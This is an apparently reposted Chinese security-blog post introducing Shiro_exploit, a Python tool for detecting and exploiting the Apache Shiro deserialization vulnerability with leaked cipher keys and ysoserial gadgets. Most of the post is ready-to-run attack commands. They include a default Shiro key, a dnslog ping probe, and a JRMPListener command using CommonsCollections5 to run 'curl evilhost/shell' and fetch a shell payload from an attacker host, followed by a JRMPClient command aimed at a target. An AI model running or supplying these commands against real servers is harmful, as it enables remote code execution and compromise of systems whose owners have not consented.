【工具篇】Apache Shiro 反序列化漏洞检测与利用工具

admin 2024年11月3日00:28:13评论10 views字数 1069阅读3分33秒阅读模式
工具介绍
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。
该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则可以选择Gadget和参数,增强灵活性。
环境

Python2.7

requests

Jdk 1.8

使用说明
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]OPTIONS:-h, --help            show this help message and exit-u URL, --url URL     Target url.-t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3-g GADGET, --gadget GADGET                        gadget-p PARAMS, --params PARAMS                        gadget params-k KEY, --key KEY     CipherKeyExample: python shiro_exploit.py -u target
检测默认只需要使用-u参数即可。
检测可用gadget的方式可以运行
python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
程序执行时会获取dnslog的域名替换 {dnshost} 这个值。不需要进行修改。目前还没解决windows和linux系统通用性的问题。这里-p自己根据实际情况指定下吧。

【工具篇】Apache Shiro 反序列化漏洞检测与利用工具

利用的话,可以采用JRMP的方式。也可以根据检测出来的gadge来进行利用。
服务器:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell –o shell'
本地:
python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="

下载地址

https://github.com/insightglacier/Shiro_exploit

原文始发于微信公众号(扫地僧的茶饭日常):【工具篇】Apache Shiro 反序列化漏洞检测与利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月3日00:28:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【工具篇】Apache Shiro 反序列化漏洞检测与利用工具http://cn-sec.com/archives/3347517.html

发表评论

匿名网友 填写信息